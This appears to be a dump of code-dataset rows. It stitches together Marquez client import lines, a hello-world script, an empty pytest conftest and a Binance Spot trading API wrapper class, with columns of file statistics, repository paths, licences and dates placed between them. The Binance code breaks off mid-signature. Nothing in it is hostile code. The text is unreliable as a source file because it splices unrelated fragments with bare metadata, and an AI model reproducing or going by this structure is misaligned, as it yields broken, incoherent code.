from marquez_codegen_client.models.create_job_run import CreateJobRun
from marquez_codegen_client.models.create_namespace import CreateNamespace
from marquez_codegen_client.models.db import DB
from marquez_codegen_client.models.dataset import Dataset
from marquez_codegen_client.models.datasets import Datasets
from marquez_codegen_client.models.iceberg import ICEBERG
from marquez_codegen_client.models.job import Job
from marquez_codegen_client.models.job_run import JobRun
from marquez_codegen_client.models.job_run_id import JobRunId
from marquez_codegen_client.models.job_run_outputs import JobRunOutputs
from marquez_codegen_client.models.job_runs import JobRuns
from marquez_codegen_client.models.job_version import JobVersion
from marquez_codegen_client.models.job_versions import JobVersions
from marquez_codegen_client.models.jobs import Jobs
from marquez_codegen_client.models.namespace import Namespace
from marquez_codegen_client.models.namespaces import Namespaces
| 41.588235
| 159
| 0.847949
| 197
| 1,414
| 5.827411
| 0.340102
| 0.162892
| 0.266551
| 0.355401
| 0.491289
| 0.308362
| 0.162021
| 0
| 0
| 0
| 0
| 0.00627
| 0.097595
| 1,414
| 33
| 160
| 42.848485
| 0.893417
| 0.211457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
16cf1e4c01abf09d46d1d823b9375411ad41e247
| 213
|
py
|
Python
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | 1
|
2021-12-17T11:03:13.000Z
|
2021-12-17T11:03:13.000Z
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | 1
|
2020-02-05T00:14:43.000Z
|
2020-02-06T09:22:49.000Z
|
Newbies/hello_world.py
|
Fernal73/LearnPython3
|
5288017c0dbf95633b84f1e6324f00dec6982d36
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""First program in Python3."""
def main():
"""Print Hello,World."""
print("Hello, World!")
if __name__ == "__main__":
main()
print("Guru99")
print("Hello, World! Again!")
| 13.3125
| 31
| 0.596244
| 26
| 213
| 4.576923
| 0.615385
| 0.252101
| 0.378151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022989
| 0.183099
| 213
| 15
| 32
| 14.2
| 0.66092
| 0.309859
| 0
| 0
| 0
| 0
| 0.345588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0
| 0
| 0.166667
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
16dbb94e3845f902e2c1c3b03fb1870934598209
| 33
|
py
|
Python
|
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
tests/conftest.py
|
florianeinfalt/cronster
|
c234a50d5234c2c076c7c16430891d94428ea4ab
|
[
"Apache-2.0"
] | null | null | null |
# cronster py.test configuration
| 16.5
| 32
| 0.818182
| 4
| 33
| 6.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.931034
| 0.909091
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc45167efe8bb5142597cdb6d657fa99ee9ccea5
| 47,955
|
py
|
Python
|
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | null | null | null |
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | 1
|
2021-04-30T22:09:21.000Z
|
2021-04-30T22:09:21.000Z
|
app/binance/src/binance/api_calls/client.py
|
DataScienceHobbyGroup/nacho-b
|
e4cfc62f2daa45cb939bb544491cdb1c1a7294ef
|
[
"MIT"
] | null | null | null |
"""
Collection of `Spot Account/Trades` APIs.
Date: 2021-05-25
Author: Vitali Lupusor
"""
# Import standard modules
from datetime import date, datetime
from typing import Literal, Optional, Union
# Import local modules
from ..helpers import get, post, delete # type: ignore
from ..helpers.type_literals import ResponseTypeOptions, TypeOptions # type: ignore # noqa: E501
class Trade:
"""Collection of `Spot Account/Trades` APIs."""
def __init__(
self, key: str, secret: str, url: Optional[str] = None
) -> None:
"""
Initialise the class.
Parameters
----------
key (str):
Binance API key.
secret (str):
TODO: Add description.
url (Optional[str]):
Server URL.
"""
self.__key = key
self.__secret = secret
self._url = url
def order(
self,
symbol: str,
side: Literal['BUY', 'SELL'],
type: TypeOptions,
timeInForce, # : Optional[] = None,
quantity: Optional[float] = None,
quoteOrderQty: Optional[float] = None,
price: Optional[float] = None,
newClientOrderId: Optional[str] = None,
stopPrice: Optional[float] = None,
icebergQty: Optional[float] = None,
newOrderRespType: Optional[ResponseTypeOptions] = None,
recvWindow: int = 5000
) -> dict:
"""
Place a new order.
Weight: 1
Data Source: Matching Engine
Other info
----------
`LIMIT_MAKER` are `LIMIT` orders that will be rejected, if they
would immediately match and trade as a taker.
`STOP_LOSS` and `TAKE_PROFIT` will execute a `MARKET` order
when the `stopPrice` is reached.
Any `LIMIT` or `LIMIT_MAKER` type order can be made an iceberg
order by sending an `icebergQty`.
Any order with an `icebergQty` MUST have `timeInForce` set to
`GTC`.
`MARKET` orders using the quantity field specifies the amount of
the base asset the user wants to buy or sell at the market price.
For example, sending a `MARKET` order on BTCUSDT will specify how
much BTC the user is buying or selling.
`MARKET` orders using `quoteOrderQty` specifies the amount the
user wants to spend (when buying) or receive (when selling) the
quote asset; the correct quantity will be determined based on the
market liquidity and `quoteOrderQty`.
Using BTCUSDT as an example:
On the BUY side, the order will buy as many BTC as
`quoteOrderQty` USDT can.
On the SELL side, the order will sell as much BTC needed to receive
`quoteOrderQty` USDT.
`MARKET` orders using `quoteOrderQty` will not break
`LOT_SIZE` filter rules; the order will execute a quantity that
will have the notional value as close as possible to
`quoteOrderQty`.
Same `newClientOrderId` can be accepted only when the previous
one is filled, otherwise the order will be rejected.
Trigger order price rules against market price for both `MARKET`
and `LIMIT` versions:
Price above market price: STOP_LOSS -> BUY, TAKE_PROFIT -> SELL
Price below market price: STOP_LOSS -> SELL, TAKE_PROFIT -> BUY
Parameters
----------
symbol (str):
TODO: Add description.
side (Literal['BUY', 'SELL']):
TODO: Add description.
type (TypeOptions):
TODO: Add description.
timeInForce (Optional[TODO]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`
].
Defaults to `None`.
quantity (Optional[float]):
TODO: It appears to be mandatory, but the documentation says
otherwise. Check it!
Requred, if `type` in [
`LIMIT`, `MARKET`, `STOP_LOSS`, `STOP_LOSS_LIMIT`,
`TAKE_PROFIT`, `TAKE_PROFIT_LIMIT`, `LIMIT_MAKER`
].
Defaults to `None`.
quoteOrderQty (Optional[float]):
TODO: Add description.
Requred, if `type` == `MARKET`.
Defaults to `None`.
price (Optional[float]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`,
`LIMIT_MAKER`
].
Defaults to `None`.
newClientOrderId (Optional[str]):
A unique id among open orders. Automatically generated, if not
sent.
TODO: Understand what the poet was trying to say and rephrase
it.
stopPrice (Optional[float]):
Required, if `type` in [
`STOP_LOSS`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT`,
`TAKE_PROFIT_LIMIT`
]
Defaults to `None`.
icebergQty (Optional[float]):
Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
create an iceberg order.
Defaults to `None`.
newOrderRespType (Optional[TODO]):
Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
order types default to FULL, all other orders default to ACK.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than 60000.
Defaults to 5000.
Returns
-------
(dict):
TODO: Add description.
"""
_timeInForce = timeInForce.upper() if timeInForce else None
return post(
self._url, 'order', self.__key, self.__secret,
symbol=symbol.upper(), side=side.upper(), type=type.upper(),
timeInForce=_timeInForce, quantity=quantity,
quoteOrderQty=quoteOrderQty, newClientOrderId=newClientOrderId,
price=price, stopPrice=stopPrice, icebergQty=icebergQty,
newOrderRespType=newOrderRespType, recvWindow=recvWindow
)
def testOrder(
self,
symbol: str,
side: Literal['BUY', 'SELL'],
type: TypeOptions,
timeInForce=None, # : Optional[] = None,
quantity: Optional[float] = None,
quoteOrderQty: Optional[float] = None,
price: Optional[float] = None,
newClientOrderId: Optional[str] = None,
stopPrice: Optional[float] = None,
icebergQty: Optional[float] = None,
newOrderRespType: Optional[ResponseTypeOptions] = None,
recvWindow: int = 5000
) -> dict:
"""
Place a new order.
Weight: 1
Data Source: Matching Engine
Other info
----------
`LIMIT_MAKER` are `LIMIT` orders that will be rejected, if they
would immediately match and trade as a taker.
`STOP_LOSS` and `TAKE_PROFIT` will execute a `MARKET` order
when the `stopPrice` is reached.
Any `LIMIT` or `LIMIT_MAKER` type order can be made an iceberg
order by sending an `icebergQty`.
Any order with an `icebergQty` MUST have `timeInForce` set to
`GTC`.
`MARKET` orders using the quantity field specifies the amount of
the base asset the user wants to buy or sell at the market price.
For example, sending a `MARKET` order on BTCUSDT will specify how
much BTC the user is buying or selling.
`MARKET` orders using `quoteOrderQty` specifies the amount the
user wants to spend (when buying) or receive (when selling) the
quote asset; the correct quantity will be determined based on the
market liquidity and `quoteOrderQty`.
Using BTCUSDT as an example:
On the BUY side, the order will buy as many BTC as
`quoteOrderQty` USDT can.
On the SELL side, the order will sell as much BTC needed to receive
`quoteOrderQty` USDT.
`MARKET` orders using `quoteOrderQty` will not break
`LOT_SIZE` filter rules; the order will execute a quantity that
will have the notional value as close as possible to
`quoteOrderQty`.
Same `newClientOrderId` can be accepted only when the previous
one is filled, otherwise the order will be rejected.
Trigger order price rules against market price for both `MARKET`
and `LIMIT` versions:
Price above market price: STOP_LOSS -> BUY, TAKE_PROFIT -> SELL
Price below market price: STOP_LOSS -> SELL, TAKE_PROFIT -> BUY
Parameters
----------
symbol (str):
TODO: Add description.
side (Literal['BUY', 'SELL']):
TODO: Add description.
type (TypeOptions):
TODO: Add description.
timeInForce (Optional[TODO]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`
].
Defaults to `None`.
quantity (Optional[float]):
TODO: It appears to be mandatory, but the documentation says
otherwise. Check it!
Requred, if `type` in [
`LIMIT`, `MARKET`, `STOP_LOSS`, `STOP_LOSS_LIMIT`,
`TAKE_PROFIT`, `TAKE_PROFIT_LIMIT`, `LIMIT_MAKER`
].
Defaults to `None`.
quoteOrderQty (Optional[float]):
TODO: Add description.
Requred, if `type` == `MARKET`.
Defaults to `None`.
price (Optional[float]):
TODO: Add description.
Requred, if `type` in [
`LIMIT`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT_LIMIT`,
`LIMIT_MAKER`
].
Defaults to `None`.
newClientOrderId (Optional[str]):
A unique id among open orders. Automatically generated, if not
sent.
TODO: Understand what the poet was trying to say and rephrase
it.
stopPrice (Optional[float]):
Required, if `type` in [
`STOP_LOSS`, `STOP_LOSS_LIMIT`, `TAKE_PROFIT`,
`TAKE_PROFIT_LIMIT`
]
Defaults to `None`.
icebergQty (Optional[float]):
Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
create an iceberg order.
Defaults to `None`.
newOrderRespType (Optional[TODO]):
Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
order types default to FULL, all other orders default to ACK.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than 60000.
Defaults to 5000.
Returns
-------
(dict)
An empty dictionary (`{}`) in case of success.
Raises
------
requests.exceptions.RequestException
If incorrect parameters provided.
"""
_timeInForce = timeInForce.upper() if timeInForce else None
return post(
self._url, 'order/test', key=self.__key, secret=self.__secret,
symbol=symbol.upper(), side=side.upper(), type=type.upper(),
timeInForce=_timeInForce, quantity=quantity,
quoteOrderQty=quoteOrderQty, newClientOrderId=newClientOrderId,
price=price, stopPrice=stopPrice, icebergQty=icebergQty,
newOrderRespType=newOrderRespType, recvWindow=recvWindow
)
def myTrades(
self,
symbol: str,
startTime: Optional[Union[str, date, datetime]] = None,
endTime: Optional[Union[str, date, datetime]] = None,
fromId: Optional[float] = None,
limit: Optional[int] = None,
recvWindow: int = 5000
) -> dict:
"""
Get trades for a specific account and symbol.
Weight: 10
Data Source: Database
Other info
----------
`fromId` TradeId to fetch from. Default gets most recent trades.
If `fromId` is set, it will get `id` >= the `fromId`.
Otherwise most recent trades are returned.
`limit` Default 500; max 1000.
`recvWindow` The value cannot be greater than `60000`
Parameters
----------
symbol (str):
Mandatory: Currency symbol of interest.
Example: `BTCUSDT` for Bitcoin vs Tether
(US dollar stablecoin)
startTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data from.
endTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data to.
fromId (Optional[int]):
Optional: The trade id to in which to get data from.
limit (Optional[int]):
Optional: The number of trades to get starting from
now - `limit`
Example: if `limit` is set to 10 the API will return
the 10 previous trades.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than `60000`.
Defaults to `5000`.
Returns
-------
(List[dict])
A list of all trades within a given range if set or the past X
number of trades either specified or defaulted to `5000`.
[
{
'symbol': 'BTCUSDT',
'id': 675286,
'orderId': 2518667,
'orderListId': -1,
'price': '50000.00000000',
'qty': '0.00019700',
'quoteQty': '9.85000000',
'commission': '0.00000000',
'commissionAsset': 'USDT',
'time': 1621011870116,
'isBuyer': False,
'isMaker': True,
'isBestMatch': True
}
]
"""
return get(
self._url, 'myTrades', key=self.__key, secret=self.__secret,
symbol=symbol.upper(), startTime=startTime, endTime=endTime,
fromId=fromId, limit=limit, recvWindow=recvWindow
)
def cancelOrder(
self,
symbol: str,
orderId: Optional[int] = None,
origClientOrderId: Optional[str] = None,
newClientOrderId: Optional[float] = None,
recvWindow: int = 5000
) -> dict:
"""
Cancel an active order.
Weight: 1
Data Source: Matching Engine
Other info
----------
Either `orderId` or `origClientOrderId` must be sent.
Parameters
----------
symbol (str):
Currency symbol.
orderId (int):
Specified when cancelling a specific order. Corresponds with
the open order to be cancelled.
origClientOrderId (str):
When the order is created a clientOrderId is generated if
not specified. This is equivelant to origClientOrderId and
can be used in this parameter
newClientOrderId (str):
Used to uniquely identify this cancel. Automatically generated
by default.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(dict):
Information regarding the cancelled order:-
{
'symbol': 'BTCUSDT',
'origClientOrderId': 'ux4BADmI0BopccaWjvU0r9',
'orderId': 4740711,
'orderListId': -1,
'clientOrderId': 'GmC4kcQCc2t4PAV6wbbpT5',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY'
}
"""
return delete(
self._url, 'order',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
orderId=orderId,
origClientOrderId=origClientOrderId,
newClientOrderId=newClientOrderId,
recvWindow=recvWindow
)
def cancelAllOpenOrders(
self,
symbol: str,
recvWindow: int = 5000
) -> dict:
"""
Cancel all active orders on a symbol.
This includes OCO orders.
Weight: 1
Data Source: Matching Engine
Other info
----------
Given a symbol, all open orders related to it will cancel.
Parameters
----------
symbol (str):
Currency symbol.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
Information confirming the cancellation of each trade that was
open and the details of each trade.
[
{
'symbol': 'BTCUSDT',
'origClientOrderId': '6uZQaihpXuvhgoICkKv6kI',
'orderId': 4723160,
'orderListId': -1,
'clientOrderId': 'RH5lwa40NhLe0ibLTz0ydv',
'price': '30000.00000000',
'origQty': '1.00000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY'
}
]
"""
return delete(
self._url, 'openOrders',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
recvWindow=recvWindow
)
def queryOrder(
self,
symbol: str,
orderId: Optional[int] = None,
origClientOrderId: Optional[str] = None,
recvWindow: int = 5000
) -> dict:
"""
Check an order's status.
Weight: 2
Data Source: Database
Other info
----------
Either `orderId` or `origClientOrderId` must be sent.
For some historical orders `cummulativeQuoteQty` will be < 0,
meaning the data is not available at this time.
Parameters
----------
symbol (str):
Currency symbol.
orderId (int):
Specified when cancelling a specific order. Corresponds with
the open order to be cancelled.
origClientOrderId (str):
When the order is created a clientOrderId is generated if
not specified. This is equivelant to origClientOrderId and
can be used in this parameter
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(dict)
Information regarding the trade that was queried.
{
'symbol': 'BTCUSDT',
'orderId': 4740711,
'orderListId': -1,
'clientOrderId': 'ux4BADmI0BopccaWjvU0r9',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'NEW',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY',
'stopPrice': '0.00000000',
'icebergQty': '0.00000000',
'time': 1622039616234,
'updateTime': 1622039616234,
'isWorking': True,
'origQuoteOrderQty': '0.00000000'
}
"""
return get(
self._url, 'order',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
orderId=orderId,
origClientOrderId=origClientOrderId,
recvWindow=recvWindow
)
def openOrders(
self,
symbol: Optional[str],
recvWindow: int = 5000
) -> dict:
"""
Get all open orders on a symbol.
Careful when accessing this with no symbol.
Weight: 3 for a single symbol; 40 when the symbol parameter is omitted
Data Source: Database
Other info
----------
If the `symbol` is not sent, orders for all symbols
will be returned in an array.
Parameters
----------
symbol (str):
Currency symbol.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
A list of all open orders for a given symbol or all open orders,
if no symbol is specified (see cautionary note).
[
{
'symbol': 'BTCUSDT',
'orderId': 4759918,
'orderListId': -1,
'clientOrderId': 'iXfVYUhccMcTNnl01TvW3Q',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'NEW',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY',
'stopPrice': '0.00000000',
'icebergQty': '0.00000000',
'time': 1622045634930,
'updateTime': 1622045634930,
'isWorking': True,
'origQuoteOrderQty': '0.00000000'
}
]
"""
return get(
self._url, 'openOrders',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper() if symbol else None,
recvWindow=recvWindow
)
def allOrders(
self,
symbol: str,
orderId: Optional[int] = None,
startTime: Optional[Union[str, date, datetime]] = None,
endTime: Optional[Union[str, date, datetime]] = None,
limit: Optional[int] = None,
recvWindow: int = 5000
) -> dict:
"""
Get all account orders; active, canceled, or filled.
Weight: 10 with symbol
Data Source: Database
Other info
----------
If `orderId` is set, it will get orders >= that `orderId`.
Otherwise most recent orders are returned.
For some historical orders `cummulativeQuoteQty` will be < 0,
meaning the data is not available at this time.
If `startTime` and/or `endTime` provided, `orderId` is not
required.
Parameters
----------
symbol (str):
Currency symbol.
orderId (int):
Specified when cancelling a specific order. Corresponds with
the open order to be cancelled.
startTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data from.
endTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data to.
limit (Optional[int]):
Optional: The number of trades to get starting from
now - `limit`
Example: if `limit` is set to 10 the API will return
the 10 previous trades.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
A list of all orders for a given symbol.
[
{
'symbol': 'BTCUSDT',
'orderId': 4759918,
'orderListId': -1,
'clientOrderId': 'iXfVYUhccMcTNnl01TvW3Q',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'NEW',
'timeInForce': 'GTC',
'type': 'LIMIT',
'side': 'BUY',
'stopPrice': '0.00000000',
'icebergQty': '0.00000000',
'time': 1622045634930,
'updateTime': 1622045634930,
'isWorking': True,
'origQuoteOrderQty': '0.00000000'
}
]
"""
return get(
self._url,
'allOrders',
key=self.__key,
secret=self.__secret,
symbol=symbol.upper(),
orderId=orderId,
startTime=startTime,
endTime=endTime,
limit=limit,
recvWindow=recvWindow
)
def account(
self,
recvWindow: int = 5000
) -> dict:
"""
Get current account information.
Weight: 10
Data Source: Memory => Database
Other info
----------
Parameters
----------
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than `60000`.
Defaults to `5000`.
Returns
-------
(List[dict])
A list of all trades within a given range if set or the past X
number of trades either specified or defaulted to 5000.
[
{
'symbol': 'BTCUSDT',
'id': 675286,
'orderId': 2518667,
'orderListId': -1,
'price': '50000.00000000',
'qty': '0.00019700',
'quoteQty': '9.85000000',
'commission': '0.00000000',
'commissionAsset': 'USDT',
'time': 1621011870116,
'isBuyer': False,
'isMaker': True,
'isBestMatch': True
}
]
"""
return get(
self._url,
'account',
key=self.__key,
secret=self.__secret,
recvWindow=recvWindow
)
def oco(
self,
symbol: str,
side: Literal['BUY', 'SELL'],
quantity: float,
price: float,
stopPrice: float,
listClientOrderId: Optional[str] = None,
limitClientOrderId: Optional[str] = None,
limitIcebergQty: Optional[float] = None,
stopClientOrderId: Optional[str] = None,
stopLimitPrice: Optional[float] = None,
stopIcebergQty: Optional[float] = None,
stopLimitTimeInForce: Optional[Literal['GTC', 'FOK', 'IOC']] = None,
newOrderRespType: Optional[ResponseTypeOptions] = None,
recvWindow: int = 5000
) -> dict:
"""
Send in a new OCO.
Weight: 1
Data Source: Matching Engine
Other info
----------
Price Restrictions:
SELL: Limit Price > Last Price > Stop Price
BUY: Limit Price < Last Price < Stop Price
Quantity Restrictions:
Both legs must have the same quantity
ICEBERG quantities however do not have to be the same.
Order Rate Limit
OCO counts as 2 orders against the order rate limit.
Parameters
----------
symbol (str):
Currency symbol.
side (Literal['BUY', 'SELL']):
Whether the position is long/buy or short/sell
quantity (float):
The quantity of the asset to buy.
price (float):
The price of which to buy an asset at. Remember:-
SELL: Limit Price > Last Price > Stop Price
BUY: Limit Price < Last Price < Stop Price
stopPrice (float):
When the price falls to this level a market order is created to
essentially close the position due to the trade going against
the intended side.
listClientOrderId (Optional[str]):
A unique Id for the entire orderList
limitClientOrderId (Optional[str]):
A unique Id for the limit order
limitIcebergQty (Optional[float]):
The quantity of the asset to buy.
stopClientOrderId (Optional[str]):
A unique Id for the stop loss/stop loss limit leg.
stopLimitPrice (Optional[float]):
When the price falls to this level a limit order is created to
essentially close the position at the specified price due to
the trade going against the intended side. Usually used to
avoid gapping past the stopPrice. If provided,
`stopLimitTimeInForce` is required.
stopIcebergQty (Optional[float]):
Used with LIMIT, STOP_LOSS_LIMIT, and TAKE_PROFIT_LIMIT to
create an iceberg order.
Defaults to `None`.
stopLimitTimeInForce (Optional[Literal['GTC', 'FOK', 'IOC']]):
Must be passed when using `stopPriceLimit`
Valid values are:
GTC Good Till Canceled
An order will be on the book unless the order is canceled.
IOC Immediate Or Cancel
An order will try to fill the order as much as it can
before the order expires.
FOK Fill or Kill
An order will expire if the full order cannot be filled
upon execution.
newOrderRespType (Optional[ResponseTypeOptions]):
Set the response JSON. ACK, RESULT, or FULL; MARKET and LIMIT
order types default to FULL, all other orders default to ACK.
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than `60000`.
Defaults to `5000`.
Returns
-------
(Dict[str, List[dict]])
Information related to the overall OCO order, a list of orders
and a report detailing the orders.
{
'orderListId': 4922,
'contingencyType': 'OCO',
'listStatusType': 'EXEC_STARTED',
'listOrderStatus': 'EXECUTING',
'listClientOrderId': 'PLNwO0VkIhqTaOyTbjzMJt',
'transactionTime': 1622390178451,
'symbol': 'BTCUSDT',
'orders': [
{
'symbol': 'BTCUSDT',
'orderId': 5730856,
'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1'
},
{
'symbol': 'BTCUSDT',
'orderId': 5730857,
'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL'
}
],
'orderReports': [
{
'symbol': 'BTCUSDT',
'orderId': 5730856,
'orderListId': 4922,
'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1',
'transactTime': 1622390178451,
'price': '51000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'NEW',
'timeInForce': 'GTC',
'type': 'STOP_LOSS_LIMIT',
'side': 'BUY',
'stopPrice': '50000.00000000'
},
{
'symbol': 'BTCUSDT',
'orderId': 5730857,
'orderListId': 4922,
'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL',
'transactTime': 1622390178451,
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'NEW',
'timeInForce': 'GTC',
'type': 'LIMIT_MAKER',
'side': 'BUY'
}
]
}
"""
return post(
self._url,
'order/oco',
key=self.__key,
secret=self.__secret,
symbol=symbol,
side=side,
quantity=quantity,
price=price,
stopPrice=stopPrice,
listClientOrderId=listClientOrderId,
limitClientOrderId=limitClientOrderId,
limitIcebergQty=limitIcebergQty,
stopClientOrderId=stopClientOrderId,
stopLimitPrice=stopLimitPrice,
stopIcebergQty=stopIcebergQty,
stopLimitTimeInForce=stopLimitTimeInForce,
newOrderRespType=newOrderRespType,
recvWindow=recvWindow
)
def cancelOrderList(
self,
symbol: str,
orderListId: Optional[float] = None,
listClientOrderId: Optional[str] = None,
newClientOrderId: Optional[str] = None,
recvWindow: int = 5000
) -> dict:
"""
Cancel an entire Order List.
Weight: 1
Data Source: Matching Engine
Other info
----------
Canceling an individual leg will cancel the entire OCO.
Either `orderListId` or `listClientOrderId` must be provided
`newClientOrderId` is used to uniquely identify this cancel,
automatically generated by default
Parameters
----------
symbol (str):
Currency symbol.
orderListId (Optional[float]):
Whether the position is long/buy or short/sell
listClientOrderId (Optional[str]):
A unique Id for the entire orderList
newClientOrderId (float):
Used to uniquely identify this cancel
recvWindow (int):
Time window in milliseconds to execute the order.
The value cannot be greater than 60000.
Defaults to 5000.
Returns
-------
(Dict[str, List[dict]])
Information related to the cancellation of the overall OCO
order, a list of orders and a report detailing the orders.
{
'orderListId': 4923,
'contingencyType': 'OCO',
'listStatusType': 'ALL_DONE',
'listOrderStatus': 'ALL_DONE',
'listClientOrderId': '7S91ZYqjQzKnylUO8IABGb',
'transactionTime': 1622393508893,
'symbol': 'BTCUSDT',
'orders': [
{
'symbol': 'BTCUSDT',
'orderId': 5739602,
'clientOrderId': 'gFoIpd2GxKb1RJMvN7dSUc'
},
{
'symbol': 'BTCUSDT',
'orderId': 5739603,
'clientOrderId': '8QzeCXJ1qFQdiDPiSczVRg'
}
],
'orderReports': [
{
'symbol': 'BTCUSDT',
'origClientOrderId': 'gFoIpd2GxKb1RJMvN7dSUc',
'orderId': 5739602,
'orderListId': 4923,
'clientOrderId': 'Ay5LlXYalziLSEswKSjWIM',
'price': '49000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'STOP_LOSS_LIMIT',
'side': 'BUY',
'stopPrice': '50000.00000000'
},
{
'symbol': 'BTCUSDT',
'origClientOrderId': '8QzeCXJ1qFQdiDPiSczVRg',
'orderId': 5739603,
'orderListId': 4923,
'clientOrderId': 'Ay5LlXYalziLSEswKSjWIM',
'price': '30000.00000000',
'origQty': '0.01000000',
'executedQty': '0.00000000',
'cummulativeQuoteQty': '0.00000000',
'status': 'CANCELED',
'timeInForce': 'GTC',
'type': 'LIMIT_MAKER',
'side': 'BUY'
}
]
}
"""
return delete(
self._url,
'orderList',
key=self.__key,
secret=self.__secret,
symbol=symbol,
orderListId=orderListId,
listClientOrderId=listClientOrderId,
newClientOrderId=newClientOrderId,
recvWindow=recvWindow
)
def allOrderList(
self,
fromId: Optional[str] = None,
